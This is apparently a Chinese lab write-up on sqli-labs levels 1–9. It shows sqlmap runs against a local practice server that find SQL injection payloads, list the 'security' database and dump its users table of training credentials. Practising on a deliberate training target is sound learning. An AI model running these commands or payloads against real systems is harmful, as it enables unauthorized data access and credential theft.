sqllibs 1-9 用sqlmap自动注入

Sqlmap是一个py文件

所以要在cmd中使用

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.3.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:30:02 /2023-04-23/

[19:30:03] [INFO] resuming back-end DBMS 'mysql'
[19:30:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 3744=3744#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:30:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:30:03] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:30:03 /2023-04-23/

判断是否有注入点

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1  --current-db
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.3.4#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:30:55 /2023-04-23/

[19:30:55] [INFO] resuming back-end DBMS 'mysql'
[19:30:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 3744=3744#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:30:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:30:56] [INFO] fetching current database
[19:30:56] [INFO] retrieved: 'security'
current database: 'security'
[19:30:56] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:30:56 /2023-04-23/

找出当前数据库

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1  -tables -D "security"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.3.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:15 /2023-04-23/

[19:31:15] [INFO] resuming back-end DBMS 'mysql'
[19:31:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 3744=3744#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:31:16] [INFO] fetching tables for database: 'security'
[19:31:16] [INFO] retrieved: 'emails'
[19:31:16] [INFO] retrieved: 'referers'
[19:31:16] [INFO] retrieved: 'uagents'
[19:31:16] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[19:31:16] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:16 /2023-04-23/

找出当前数据库下的所有的表

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1  -columns -D "security" -T "users"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.3.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:43 /2023-04-23/

[19:31:43] [INFO] resuming back-end DBMS 'mysql'
[19:31:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 3744=3744#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:43] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.6
[19:31:43] [INFO] fetching columns for table 'users' in database 'security'
[19:31:43] [INFO] resumed: 'id'
[19:31:43] [INFO] resumed: 'int(3)'
[19:31:43] [INFO] resumed: 'username'
[19:31:43] [INFO] resumed: 'varchar(20)'
[19:31:43] [INFO] resumed: 'password'
[19:31:43] [INFO] resumed: 'varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[19:31:43] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:43 /2023-04-23/

找出users中的字段，发现username和password

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1  -columns -D "security" -T "users" -dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.3.4#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:55 /2023-04-23/

[19:31:55] [INFO] resuming back-end DBMS 'mysql'
[19:31:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 3744=3744#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:31:55] [INFO] fetching columns for table 'users' in database 'security'
[19:31:55] [INFO] resumed: 'id'
[19:31:55] [INFO] resumed: 'int(3)'
[19:31:55] [INFO] resumed: 'username'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] resumed: 'password'
[19:31:55] [INFO] resumed: 'varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[19:31:55] [INFO] fetching columns for table 'users' in database 'security'
[19:31:55] [INFO] resumed: 'id'
[19:31:55] [INFO] resumed: 'int(3)'
[19:31:55] [INFO] resumed: 'username'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] resumed: 'password'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] fetching entries for table 'users' in database 'security'
[19:31:55] [INFO] resumed: '1'
[19:31:55] [INFO] resumed: 'Dumb'
[19:31:55] [INFO] resumed: 'Dumb'
[19:31:55] [INFO] resumed: '2'
[19:31:55] [INFO] resumed: 'I-kill-you'
[19:31:55] [INFO] resumed: 'Angelina'
[19:31:55] [INFO] resumed: '3'
[19:31:55] [INFO] resumed: 'p@ssword'
[19:31:55] [INFO] resumed: 'Dummy'
[19:31:55] [INFO] resumed: '4'
[19:31:55] [INFO] resumed: 'crappy'
[19:31:55] [INFO] resumed: 'secure'
[19:31:55] [INFO] resumed: '5'
[19:31:55] [INFO] resumed: 'stupidity'
[19:31:55] [INFO] resumed: 'stupid'
[19:31:55] [INFO] resumed: '6'
[19:31:55] [INFO] resumed: 'genious'
[19:31:55] [INFO] resumed: 'superman'
[19:31:55] [INFO] resumed: '7'
[19:31:55] [INFO] resumed: 'mob!le'
[19:31:55] [INFO] resumed: 'batman'
[19:31:55] [INFO] resumed: '8'
[19:31:55] [INFO] resumed: 'admin'
[19:31:55] [INFO] resumed: 'admin'
[19:31:55] [INFO] resumed: '9'
[19:31:55] [INFO] resumed: 'admin1'
[19:31:55] [INFO] resumed: 'admin1'
[19:31:55] [INFO] resumed: '10'
[19:31:55] [INFO] resumed: 'admin2'
[19:31:55] [INFO] resumed: 'admin2'
[19:31:55] [INFO] resumed: '11'
[19:31:55] [INFO] resumed: 'admin3'
[19:31:55] [INFO] resumed: 'admin3'
[19:31:55] [INFO] resumed: '12'
[19:31:55] [INFO] resumed: 'dumbo'
[19:31:55] [INFO] resumed: 'dhakkan'
[19:31:55] [INFO] resumed: '14'
[19:31:55] [INFO] resumed: 'admin4'
[19:31:55] [INFO] resumed: 'admin4'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

[19:31:55] [INFO] table 'security.users' dumped to CSV file 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2\dump\security\users.csv'
[19:31:55] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:55 /2023-04-23/

获取users表下的信息

sqllibs的前面9道题是一样的套路